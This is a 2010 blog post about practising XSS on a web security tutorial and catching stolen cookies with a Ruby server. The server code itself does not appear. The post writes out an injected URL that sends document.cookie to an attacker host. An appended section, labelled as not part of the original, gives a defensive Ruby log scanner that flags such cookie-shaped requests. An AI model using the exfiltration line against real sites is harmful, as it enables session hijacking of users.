Sunday, November 14, 2010

Simple Ruby Cookie Catcher

So I've been playing around with some XSS the last couple of days on Google Code University's web security tutorial and it's pretty awesome. However, injecting <script>alert("xss!")</script> isn't quite as fun as actually stealing data.

So I did a quick Google search for simple cookie-catching scripts, only they were pretty much all in PHP. So I decided to whip up something quick in Ruby. And so, without further ado...



There you go. The XSS script needs to make the browser issue an HTTP GET request to the Ruby server; the URL can look like anything, as long as it includes a '?' followed by a query string containing the desired data (like a cookie). The URL I build looks like:
"http://blahblah.com:8080/hai?"+document.cookie

You can pass as much data in the query string as you'd like, and all the results are written out to cookiejar.txt.
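For the defender's side of the same trick, here is an added example that is not part of the original post: a small Ruby heuristic that scans egress/proxy log lines for GET requests whose query string has the shape of document.cookie (several name=value pairs joined by semicolons, or a single well-known session-cookie name), which is exactly what the URL above produces. The log lines and the session-cookie name list are constructed for this example.

```ruby
require 'cgi'

# Names that, on their own, are worth flagging even as a single pair (constructed list).
SESSION_NAME = /\A(PHPSESSID|JSESSIONID|ASP\.NET_SessionId|sessionid|session|sid|auth|token|remember_me)\z/i

# Returns the cookie-like "name=value" pairs carried in a URL's query string,
# or an empty array when the query does not look like a cookie jar.
def cookie_pairs(url)
  _, query = url.split('?', 2)
  return [] if query.nil? || query.empty?
  # document.cookie reads "a=1; b=2"; browsers send the space as %20, so decode first.
  pairs = CGI.unescape(query).split(/;\s*/).map(&:strip)
  pairs = pairs.select { |p| p.include?('=') && p.split('=', 2)[0] =~ /\A[\w.-]+\z/ }
  names = pairs.map { |p| p.split('=', 2)[0] }
  return pairs if pairs.size >= 2                       # several cookies in one query string
  return pairs if names.any? { |n| n =~ SESSION_NAME }  # one pair, but a session cookie name
  []
end

# Scans combined-format proxy log text (absolute URLs in the request line) and
# returns one hash per suspicious request: the destination host and cookie names.
def scan_log(text)
  text.each_line.map do |line|
    next unless line =~ /"GET (\S+) HTTP/
    url = Regexp.last_match(1)
    pairs = cookie_pairs(url)
    next if pairs.empty?
    host = url[%r{\Ahttps?://([^/:]+)}, 1] || 'unknown'
    { host: host, cookies: pairs.map { |p| p.split('=', 2)[0] } }
  end.compact
end

# Constructed sample proxy log lines, not real traffic.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [14/Nov/2010:12:00:01 +0000] "GET http://www.example.com/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  10.0.0.7 - - [14/Nov/2010:12:00:02 +0000] "GET http://blahblah.com:8080/hai?PHPSESSID=abc123;%20user=bob HTTP/1.1" 404 0 "http://intranet.example/" "Mozilla/5.0"
  10.0.0.9 - - [14/Nov/2010:12:00:03 +0000] "GET http://search.example.com/search?q=ruby+cookies HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
LOG

scan_log(SAMPLE_LOG).each { |hit| puts "cookie-shaped query sent to #{hit[:host]}: #{hit[:cookies].join(', ')}" }
```

Cookies set with the HttpOnly flag are not readable through document.cookie, so they never appear in such a query string; this scanner only surfaces the ones that were left readable to script.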